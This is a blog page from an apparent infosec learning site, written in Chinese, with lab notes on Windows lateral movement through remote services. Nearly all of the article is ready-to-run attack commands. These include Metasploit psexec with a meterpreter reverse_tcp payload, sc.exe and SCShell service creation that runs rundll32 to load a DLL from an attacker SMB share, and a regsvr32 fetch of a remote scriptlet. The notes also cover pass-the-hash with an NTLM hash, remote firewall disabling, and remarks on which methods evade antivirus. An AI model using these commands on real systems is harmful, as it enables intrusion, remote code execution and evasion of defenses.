

  <!DOCTYPE html>
  <html lang="en" data-default-color-scheme=&#34;dark&#34; >
  <style>
    .text1
    {
    text-shadow: 0px 0px 2px #f2f3f2;
    }
    </style>

  

<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/null">
  <link rel="icon" type="image/png" href="/null">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>sc远程服务横向移动 - whale3070&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.7","typing":{"enable":false,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


    <body>
      <header style="height: 70vh;">
        <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>InfoSec learning</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          
        
      </ul>
    </div>
  </div>
</nav>

          <div class="banner" id="banner" false
            style="background: url('/img/default.png') no-repeat center center;
              background-size: cover;">
              <div class="full-bg-img">
                <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
                  <div class="page-header text-center fade-in-up">
                    <span class="h2 text1" id="subtitle" title="sc远程服务横向移动">
                      
                        sc远程服务横向移动
                      
                    </span>
        
                    
                      <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-05-20 15:27" pubdate>
        May 20, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      890 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      15
       分钟
    </span>
  

  
  
</div>

                    
                  </div>
                    
                  </div>
                  
                </div>
              </div>
          </div>
      </header>

      <main>
        
          

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sc远程服务横向移动</h1>
            
            <div class="markdown-body">
              <h1 id="横向移动手法介绍教程"><a href="#横向移动手法介绍教程" class="headerlink" title="横向移动手法介绍教程"></a>横向移动手法介绍教程</h1><ol>
<li><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1Hz4y1Z7pJ">https://www.bilibili.com/video/BV1Hz4y1Z7pJ</a></li>
<li><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=2">https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=2</a></li>
<li><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=3">https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=3</a></li>
</ol>
<h2 id="smbmap信息搜集"><a href="#smbmap信息搜集" class="headerlink" title="smbmap信息搜集"></a>smbmap信息搜集</h2><p>远程管理必须使用Admin$</p>
<p>查看远程共享</p>
<figure class="highlight apache"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute">smbmap</span> -H <span class="hljs-number">192.168.123.45</span><br><br><span class="hljs-attribute">smbmap</span> -u administrator -p <span class="hljs-number">123456</span> -d workgroup -H <span class="hljs-number">192.168.123.45</span><br></code></pre></div></td></tr></table></figure>
<h2 id="msf-psexec-（成功，不免杀，开启防火墙则无效）"><a href="#msf-psexec-（成功，不免杀，开启防火墙则无效）" class="headerlink" title="msf psexec （成功，不免杀，开启防火墙则无效）"></a>msf psexec （成功，不免杀，开启防火墙则无效）</h2><p>使用的是139，445端口，目标机器必须开放这个端口。</p>
<figure class="highlight pgsql"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs pgsql"><span class="hljs-number">1.</span> impacket-smbserver<br><span class="hljs-number">2.</span> msf psexec<br><br>use exploit/windows/smb/psexec<br><span class="hljs-keyword">set</span> payload windows/x64/meterpreter/reverse_tcp<br><span class="hljs-keyword">set</span> RHOST <span class="hljs-number">192.168</span><span class="hljs-number">.123</span><span class="hljs-number">.45</span><br><span class="hljs-keyword">set</span> LPORT &lt;<span class="hljs-keyword">Local</span> Port&gt;<br><span class="hljs-keyword">set</span> LHOST &lt;<span class="hljs-keyword">Local</span> IP&gt;<br><span class="hljs-keyword">set</span> SMBUSER &lt;<span class="hljs-keyword">local</span> <span class="hljs-keyword">admin</span> username&gt;<br><span class="hljs-keyword">set</span> SMBPASS &lt;<span class="hljs-keyword">local</span> <span class="hljs-keyword">admin</span> <span class="hljs-keyword">password</span>&gt;<br>exploit<br></code></pre></div></td></tr></table></figure>
<p>漏洞利用，使用口令去进行命令执行<br>mimikatz，windows明文密码放在桌面，暴力破解，</p>
<h2 id="psexec-py（成功，不免杀，开启防火墙则无效）"><a href="#psexec-py（成功，不免杀，开启防火墙则无效）" class="headerlink" title="psexec.py（成功，不免杀，开启防火墙则无效）"></a>psexec.py（成功，不免杀，开启防火墙则无效）</h2><p>python /usr/share/doc/python-impacket/examples/psexec.py workgroup/administrator@192.168.123.45 cmd.exe</p>
<h2 id="sc-exe-（成功，开启防火墙也有效，不免杀）"><a href="#sc-exe-（成功，开启防火墙也有效，不免杀）" class="headerlink" title="sc.exe （成功，开启防火墙也有效，不免杀）"></a>sc.exe （成功，开启防火墙也有效，不免杀）</h2><p>开启rundll32的反弹shell监听服务器，不会的可以看这个视频：<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1ey4y1k7PA/">https://www.bilibili.com/video/BV1ey4y1k7PA/</a></p>
<figure class="highlight taggerscript"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs taggerscript">激活管理员账号<br>net user administrator /active:yes<br><br>net use <span class="hljs-symbol">\\</span>192.168.123.45<span class="hljs-symbol">\a</span>dmin$ /user:&quot;administrator&quot; &quot;123456&quot;<br><br>net use <span class="hljs-symbol">\\</span>192.168.123.45<span class="hljs-symbol">\a</span>dmin$ /del<br><br>net share可以查看本机开放的资源<br><br>sc <span class="hljs-symbol">\\</span>192.168.123.45 create whaleReverse15 binpath= &quot;C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>md.exe /c C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\r</span>undll32.exe <span class="hljs-symbol">\\</span>192.168.123.123<span class="hljs-symbol">\A</span>zye<span class="hljs-symbol">\t</span>est.dll,0&quot;<br><br>sc <span class="hljs-symbol">\\</span>192.168.123.45 start whaleReverse15<br></code></pre></div></td></tr></table></figure>
<h2 id="csexec（能过360，但不能过windows防火墙）"><a href="#csexec（能过360，但不能过windows防火墙）" class="headerlink" title="csexec（能过360，但不能过windows防火墙）"></a>csexec（能过360，但不能过windows防火墙）</h2><figure class="highlight nginx"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs nginx"><span class="hljs-attribute">net</span> user administrator <span class="hljs-number">123456</span><br>net use \\<span class="hljs-number">192.168.28.1</span>\admin$ /user:<span class="hljs-string">&quot;administrator&quot;</span> <span class="hljs-string">&quot;qwf123!!&quot;</span><br>csexec.exe \\<span class="hljs-number">192.168.28.1</span> cmd.exe<br>操作超时<br><br>net use \\<span class="hljs-number">192.168.123.45</span>\admin$ /user:<span class="hljs-string">&quot;administrator&quot;</span> <span class="hljs-string">&quot;123456&quot;</span><br>csexec.exe \\<span class="hljs-number">192.168.123.45</span> cmd.exe<br>没有安装./net2<br><br>net use \\<span class="hljs-number">192.168.123.184</span>\admin$ /user:<span class="hljs-string">&quot;administrator&quot;</span> <span class="hljs-string">&quot;123456&quot;</span><br>csexec.exe \\<span class="hljs-number">192.168.123.45</span> cmd.exe<br></code></pre></div></td></tr></table></figure>
<h1 id="用法有点复杂，没有继续看的工具"><a href="#用法有点复杂，没有继续看的工具" class="headerlink" title="用法有点复杂，没有继续看的工具"></a>用法有点复杂，没有继续看的工具</h1><h2 id="scshell"><a href="#scshell" class="headerlink" title="scshell"></a>scshell</h2><figure class="highlight taggerscript"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs taggerscript">使用这篇反弹shell “https://whale3070.github.io/tools/2020/10/04/11-x/”中提到的Regsvr32.exe<br><br>regsvr32 /s /n /u /i:http://192.168.123.123:8080/6IEDA48otwgL.sct<br>生成一个注册表<br><br>SCShell.exe 192.168.123.45 filepermsvc &quot;C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>md.exe /c C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\r</span>undll32.exe <span class="hljs-symbol">\\</span>192.168.123.123<span class="hljs-symbol">\r</span>DAEep<span class="hljs-symbol">\t</span>est.dll,0&quot; . administrastor 123456<br><br>regsvr32 /s /n /u /i:http://192.168.123.123:8080/6IEDA48otwgL.sct scrobj.dll<br>rundll32.exe <span class="hljs-symbol">\\</span>192.168.123.123<span class="hljs-symbol">\M</span>Jear<span class="hljs-symbol">\t</span>est.dll,0<br><br>python scshell.py -target-ip 192.168.123.45 -service-name filepermsvc -no-cmd &quot; C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\r</span>undll32.exe <span class="hljs-symbol">\\</span>192.168.123.123<span class="hljs-symbol">\r</span>DAEep<span class="hljs-symbol">\t</span>est.dll,0&quot; . administrastor 123456<br><br>SharpMove.exe action=query computername=192.168.123.45 query=&quot;filepermsvc&quot; username=administrastor password=123456<br><br>SCShell.exe 192.168.123.45 filepermsvc &quot;C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>md.exe /C C:<span class="hljs-symbol">\W</span>indows<span class="hljs-symbol">\M</span>icrosoft.NET<span class="hljs-symbol">\F</span>ramework<span class="hljs-symbol">\v</span>4.0.30319<span class="hljs-symbol">\m</span>sbuild.exe C:<span class="hljs-symbol">\p</span>ayload.csproj&quot; . administrator 123456<br></code></pre></div></td></tr></table></figure>
<p>2020.10.07</p>
<figure class="highlight apache"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute">python3</span> scshell.py WORKGROUP/WIN-U<span class="hljs-number">8</span>OIU<span class="hljs-number">3</span>QM<span class="hljs-number">15</span>C@<span class="hljs-number">192.168.123.45</span> -hashes aad<span class="hljs-number">3</span>b<span class="hljs-number">435</span>b<span class="hljs-number">51404</span>eeaad<span class="hljs-number">3</span>b<span class="hljs-number">435</span>b<span class="hljs-number">51404</span>ee:<span class="hljs-number">58</span>a<span class="hljs-number">478135</span>a<span class="hljs-number">93</span>ac<span class="hljs-number">3</span>bf<span class="hljs-number">058</span>a<span class="hljs-number">5</span>ea<span class="hljs-number">0</span>e<span class="hljs-number">8</span>fdb<span class="hljs-number">71</span><br><span class="hljs-attribute">C</span>:\windows\system<span class="hljs-number">32</span>\cmd.exe /c C:\windows\system<span class="hljs-number">32</span>\rundll<span class="hljs-number">32</span>.exe \\<span class="hljs-number">192.168.123.123</span>\wLWQND\test.dll,<span class="hljs-number">0</span><br></code></pre></div></td></tr></table></figure>
<p>原理：</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs taggerscript">sc config filepermsvc binpath= &quot;C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>md.exe /c C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\r</span>undll32.exe <br><span class="hljs-symbol">\\</span>192.168.123.123<span class="hljs-symbol">\w</span>LWQND<span class="hljs-symbol">\t</span>est.dll,0&quot;<br><br>目标机器本地执行成功<br>C:<span class="hljs-symbol">\U</span>sers<span class="hljs-symbol">\A</span>dministrator<span class="hljs-symbol">\D</span>esktop<span class="hljs-symbol">\S</span>CShell.exe local filepermsvc &quot;C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>md.exe /c C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\r</span>undll32.exe <span class="hljs-symbol">\\</span>192.168.123.123<span class="hljs-symbol">\h</span>ltzs<span class="hljs-symbol">\t</span>est.dll,0&quot; . administrator 123456<br><br>攻击机器执行：<br>D:<span class="hljs-symbol">\文</span>件同步<span class="hljs-symbol">\t</span>mp<span class="hljs-symbol">\横</span>向移动参考资料<span class="hljs-symbol">\工</span>具<span class="hljs-symbol">\S</span>CShell-master<span class="hljs-symbol">\S</span>CShell-master<span class="hljs-symbol">\S</span>CShell.exe 192.168.123.45 filepermsvc &quot;C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>md.exe /c C:<span class="hljs-symbol">\w</span>indows<span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\r</span>undll32.exe <span class="hljs-symbol">\\</span>192.168.123.123<span class="hljs-symbol">\h</span>ltzs<span class="hljs-symbol">\t</span>est.dll,0&quot; . administrator 123456<br></code></pre></div></td></tr></table></figure>
<h2 id="sharpmove"><a href="#sharpmove" class="headerlink" title="sharpmove"></a>sharpmove</h2><figure class="highlight routeros"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs routeros">SharpMove.exe <span class="hljs-attribute">action</span>=startservice <span class="hljs-attribute">computername</span>=remote.host.local <span class="hljs-attribute">servicename</span>=TestService<br></code></pre></div></td></tr></table></figure>
<h2 id="关闭防火墙命令"><a href="#关闭防火墙命令" class="headerlink" title="关闭防火墙命令"></a>关闭防火墙命令</h2><p>关闭公网上的防火墙<br><code>netsh advfirewall set  currentprofile state off</code></p>
<p>关闭内网中的防火墙<br><code>netsh advfirewall set privateprofile state off</code></p>
<h3 id="远程关闭防火墙"><a href="#远程关闭防火墙" class="headerlink" title="远程关闭防火墙"></a>远程关闭防火墙</h3><figure class="highlight pf"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs pf">netsh -r <span class="hljs-number">192.168</span>.<span class="hljs-number">123.45</span> -u administrator -p <span class="hljs-number">123456</span> -c advfirewall <span class="hljs-built_in">set</span> allprofiles <span class="hljs-keyword">state</span> <span class="hljs-keyword">on</span><br><br></code></pre></div></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior">https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior</a></p>
<p><a target="_blank" rel="noopener" href="https://www.windows-commandline.com/enable-disable-firewall-command-line/">https://www.windows-commandline.com/enable-disable-firewall-command-line/</a></p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a target="_blank" rel="noopener" href="https://pentestlab.blog/2020/07/21/lateral-movement-services/">https://pentestlab.blog/2020/07/21/lateral-movement-services/</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/Mr-Un1k0d3r/SCShell">https://github.com/Mr-Un1k0d3r/SCShell</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/0xthirteen/MoveKit">https://github.com/0xthirteen/MoveKit</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/0xthirteen/SharpMove">https://github.com/0xthirteen/SharpMove</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/0xthirteen/SharpRDP">https://github.com/0xthirteen/SharpRDP</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/windows/">windows</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/windows/">windows</a>
                    
                      <a class="hover-with-bg" href="/tags/lateral-movement/">lateral-movement</a>
                    
                  </div>
                
              </div>
              
                
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/05/20/windows%E6%8F%90%E6%9D%83%E5%AF%BC%E8%88%AA%E9%A1%B5/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile"></span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/05/20/2020-10-24-09-x/">
                        <span class="hidden-mobile">零组镜像导航页</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


            

                
                  <a id="scroll-top-button" href="#" role="button">
                    <i class="iconfont icon-arrowup" aria-hidden="true"></i>
                  </a>
                  

                    
                      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
                        

                          
      </main>

      <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://whale3070.github.io/" target="_blank" rel="nofollow noopener"><span>Whale3070</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>






  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



    </body>

  </html>